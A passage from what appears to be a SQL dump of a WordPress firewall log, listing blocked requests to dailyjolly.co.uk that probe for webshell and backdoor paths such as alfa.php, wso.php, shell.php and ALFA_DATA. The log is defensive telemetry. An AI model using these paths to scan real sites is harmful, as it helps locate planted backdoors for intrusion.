User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3JhZGlvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11191,1673898018.803682,1673898018.638400,'\0\0\0\0\0\0\0\0\0\0��[',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_ne.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11192,1673898017.906908,1673898017.761300,'\0\0\0\0\0\0\0\0\0\0��[',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_e.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11193,1673898004.704286,1673898004.548700,'\0\0\0\0\0\0\0\0\0\0��[',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11194,1673898004.305403,1673898004.171800,'\0\0\0\0\0\0\0\0\0\0��[',0,403,0,0,0,'https://www.dailyjolly.co.uk/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11195,1673897980.286397,1673897980.150800,'\0\0\0\0\0\0\0\0\0\0��[',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11196,1673897945.899812,1673897945.770000,'\0\0\0\0\0\0\0\0\0\0��[',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11197,1673898512.671435,1673898512.535400,'\0\0\0\0\0\0\0\0\0\0��[�RS',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/outcms.php?up=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvb3V0Y21zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11198,1673898498.055253,1673898497.933400,'\0\0\0\0\0\0\0\0\0\0��[�RS',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/db-cache.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvZGItY2FjaGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11199,1673898497.010093,1673898496.886800,'\0\0\0\0\0\0\0\0\0\0��[�RS',0,403,0,0,0,'https://www.dailyjolly.co.uk/gank.php.PhP','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2dhbmsucGhwLlBoUA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11200,1673898496.099851,1673898495.968700,'\0\0\0\0\0\0\0\0\0\0��[�RS',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-plugins.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXBsdWdpbnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11201,1673898422.755653,1673898422.603900,'\0\0\0\0\0\0\0\0\0\0��[�RS',0,403,0,0,0,'https://www.dailyjolly.co.uk/legion.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2xlZ2lvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11202,1673898375.878179,1673898375.729200,'\0\0\0\0\0\0\0\0\0\0��[�RS',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11203,1673898353.057759,1673898352.903800,'\0\0\0\0\0\0\0\0\0\0��[��',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11204,1673898286.000479,1673898285.886000,'\0\0\0\0\0\0\0\0\0\0��[��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/mu-plugins/db-safe-mode.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy9kYi1zYWZlLW1vZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11205,1673898833.106078,1673898832.972700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11206,1673898787.158489,1673898787.029700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11207,1673898684.673651,1673898684.542700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11208,1673898639.167897,1673898639.039500,'\0\0\0\0\0\0\0\0\0\0��[�RS',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11209,1673898604.089630,1673898603.962600,'\0\0\0\0\0\0\0\0\0\0��[�RS',0,403,0,0,0,'https://www.dailyjolly.co.uk/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11210,1673898567.364644,1673898567.253100,'\0\0\0\0\0\0\0\0\0\0��[�RS',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11211,1673898566.335445,1673898566.162400,'\0\0\0\0\0\0\0\0\0\0��[�RS',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11212,1673898565.181739,1673898565.068400,'\0\0\0\0\0\0\0\0\0\0��[�RS',0,403,0,0,0,'https://www.dailyjolly.co.uk/error.php?phpshells=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Vycm9yLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11213,1673898563.911534,1673898563.785100,'\0\0\0\0\0\0\0\0\0\0��[�RS',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-backup-sql-302.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJhY2t1cC1zcWwtMzAyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11214,1673898562.715630,1673898562.584700,'\0\0\0\0\0\0\0\0\0\0��[�RS',0,403,0,0,0,'https://www.dailyjolly.co.uk/system_log.php?bala=up','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N5c3RlbV9sb2cucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11215,1673899160.103024,1673899159.981800,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/shells.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxscy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11216,1673899159.684057,1673899159.576600,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/about.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Fib3V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11217,1673899159.299589,1673899159.190900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11218,1673899158.907335,1673899158.799900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11219,1673899158.543485,1673899158.410700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfa.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11220,1673899158.174165,1673899158.060400,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11221,1673899157.809961,1673899157.657700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/test.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Rlc3QucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11222,1673899157.406589,1673899157.293900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/a.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2EucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11223,1673899157.048313,1673899156.933600,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/z.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3oucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11224,1673899156.686550,1673899156.571400,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/x.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3gucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11225,1673899156.321678,1673899156.215300,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/1.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"LzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11226,1673899155.968607,1673899155.860500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/upload.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwbG9hZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11227,1673899155.597715,1673899155.489900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11228,1673899155.228278,1673899155.121300,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/shell.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11229,1673899154.866403,1673899154.759400,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wso.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dzby5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11230,1673899154.478562,1673899154.371900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/xleet.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3hsZWV0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11231,1673899153.927131,1673899153.781700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/olux.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L29sdXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11232,1673899152.217398,1673899152.107500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/index.php?3x=3x','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2luZGV4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11233,1673899151.737936,1673899151.629200,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ubh/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91YmgvdXAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11234,1673899148.956643,1673899148.824500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11235,1673899147.982069,1673899147.869000,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11236,1673899147.026014,1673899146.903000,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11237,1673899144.661751,1673899144.537100,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11238,1673899143.774250,1673899143.649100,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11239,1673899142.825377,1673899142.702900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(11240,1673899140.205102,1673899140.078200,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11241,1673899128.194708,1673899128.065000,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11242,1673899102.536583,1673899102.405000,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11243,1673899079.240375,1673899079.112200,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11244,1673899055.575781,1673899055.436300,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11245,1673899018.726548,1673899018.554600,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious 